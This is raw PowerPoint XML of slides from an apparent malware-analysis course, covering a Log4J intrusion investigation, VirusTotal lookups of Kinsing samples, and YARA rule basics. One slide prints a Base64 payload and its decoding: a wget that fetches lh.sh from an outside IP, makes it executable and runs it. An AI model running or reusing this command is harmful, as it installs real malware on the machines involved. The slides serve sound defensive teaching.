                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7D99D3-052B-1482-85E2-ACD14D5F65F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decodes to (Base64)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://62.210.130.250/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh;chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lh.sh</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lh.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make it executable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2803740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98311-8C5D-8C6E-3088-F64173C67B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4J Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E35C33A-F40D-74B8-DB51-B89CF3674402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>lh.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5 0e1a1382d4fd420f8a5ae1d88b3085e7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/4d44e9ffdaa91e0d63795b9a263a19ad1edd330d800005708cd44710ac09e653</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4076DE2-C35C-9FC8-F36C-2FB8C3821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52" y="3221336"/>
            <a:ext cx="7034616" cy="2561625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42222798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6B1D-ED6B-D778-FD92-E01735AD3983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log4J Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F7C6DA9-A85F-EE0A-743A-594CE4856BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>kinsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 648effa354b3cbaad87b45f48d59c616</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>libsystem.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ccef46c7edf9131ccffc47bd69eb743b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a/community</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31426752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053D-A0B2-AFFC-24A6-68C232BCC5B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.virustotal.com/graph/g99c8405df698414192c3e5c8dae3d7f3cbbe7a3c1fdf4e478207ac586cf2dde6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C11384-29E0-2F52-45F9-B374B2084E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05871"/>
            <a:ext cx="9151444" cy="4138875"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4225027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92B8-A938-F843-9836-8D3FEF9CE013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Automated Malware Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77585C20-BBF5-7042-A478-DA9B1B18445D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Take 20 minutes to review the sample malware analysis URLs we have gone over/are in the Exercises document for this week.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Some questions to ask in your review:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What malicious indicators are present?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What network connections are made?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What URLs are accessed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301449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43B6-726E-0548-AC55-DE3DAE5EBA13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YARA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CBB2B1-2A64-504B-94A2-9921A3008048}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool for malware research/detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create rules (signatures) based on text/binary patterns/actions of a suspecting malicious file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://virustotal.github.io/yara/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/InQuest/awesome-yara</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1101031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778C-AAFD-004F-A50D-3A1ED0ACD269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YARA Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF6124AF-4BB5-2242-B0B5-17A72F0B0E17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rule </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rule_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	meta:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		created = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1/1/2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		modified = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1/2/2020</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		author = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	strings:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="11430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$string1 = "blah"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	condition:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>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$string1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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73789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1DF1-5BC7-E44E-B617-BBB44980768A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>YARA Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{920050F5-A624-DE4A-AD47-F04E5C99953E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strings can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foobar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hexidecimal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>– 66 6F 6F 62 61 72</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regular Expression - /^GIF8[79]a/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="630470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7B00-D007-E346-A74B-B160729C68BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sample rule</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CBF7B21-50C5-104F-B7C1-F14E1189FCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
